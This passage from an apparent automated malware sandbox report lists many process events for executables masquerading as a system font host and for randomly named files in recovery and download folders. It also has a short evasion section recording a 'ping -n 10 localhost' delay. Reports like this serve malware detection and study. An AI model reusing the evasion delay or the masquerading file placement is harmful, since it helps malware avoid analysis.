                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1B160000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1AA90000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1890000 memory reserve | memory write watch
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1B4B0000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 24B0000 memory reserve | memory write watch
